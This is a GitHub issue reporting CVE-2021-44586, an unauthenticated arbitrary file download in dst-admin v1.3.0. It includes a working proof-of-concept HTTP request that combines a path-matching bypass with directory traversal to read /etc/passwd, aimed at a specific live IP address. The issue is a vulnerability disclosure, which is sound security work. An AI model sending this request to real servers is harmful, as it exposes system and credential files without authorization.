Headline
CVE-2021-44586: A security issue · Issue #28 · qinming99/dst-admin
An issue was discovered in dst-admin v1.3.0. The product has an unauthorized arbitrary file download vulnerability that can expose sensitive information.
Hi,guys!
There is a serious security problem in your code.
About a few weeks ago, I found a function point in your website background that can lead to arbitrary file download
But it must use a account and password.
However, I found a new way to download any file in unauth.
That means I can download any file without authorization without using my account and password.
Here is the example
Target: http://106.15.186.197:8080
And the http data is:
GET /images;/../backup/download?fileName=../../../../../../../../etc/passwd HTTP/1.1 Host: 106.15.186.197:8080 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0) Gecko/20100101 Firefox/92.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 Accept-Encoding: gzip, deflate Connection: close Upgrade-Insecure-Requests: 1
poc: /images;/…/backup/download?fileName=…/…/…/…/…/…/…/…/etc/passwd
Remember to use burpsuite not browser
Have a nice day!